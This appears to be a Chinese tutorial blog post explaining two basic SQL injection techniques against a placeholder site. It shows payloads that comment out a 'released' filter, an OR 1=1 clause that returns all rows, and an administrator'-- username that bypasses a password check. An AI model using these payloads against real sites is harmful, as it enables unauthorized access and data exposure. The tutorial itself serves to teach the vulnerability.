SQLi 的例子-1-获取隐藏的数据 & bypass

常见SQL注入的例子有:

1. 获取隐藏数据,修改SQL查询命令获得额外的结果

先看sql命令

SELECT * FROM products WHERE category = 'Gifts' AND released = 1
  • 以上是查询gifts分类并且是已经发布的产品 released =1 已经发布的商品,released =0 未发布的产品
  • This SQL query asks the database to return:

    需要数据库返回,从products表中满足分类是gifts且released=1的所有数据
  • 应用没有做sqli的保护,攻击者可以构造这么个请求
  • https://insecure-website.com/products?category=Gifts'--

    到sql里就是,

  • SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1

    因为sql中--是注释,所以后面就不起作用了,这样就可以获得gitfs里的所有内容,不管是否released

  • 更进一步,可以获取所有分类的数据,构造请求

  • https://insecure-website.com/products?category=Gifts'+OR+1=1--

    sql 解析

  • SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1

1=1 永远为真,并且 or

所以返回搜有items,不仅仅是gifts

2. bypass ,改变原来的逻辑

web应用需要用户输入账号密码,如果应用没有做任何防sqli的处理,可能直接用输入的username跟password组成这么个查询语句,这种场景就非常容易被攻击了

SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'

只要构造个输入达到以下目的即可。获得admin权限,即使在不知道密码的情况下,因为--是注释。这个adminstrator可以是试出来的,也可能是admin

SELECT * FROM users WHERE username = 'administrator'--' AND password = ''

所以登陆输入username = administrator'--

随便输入密码就能实现bypass了

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值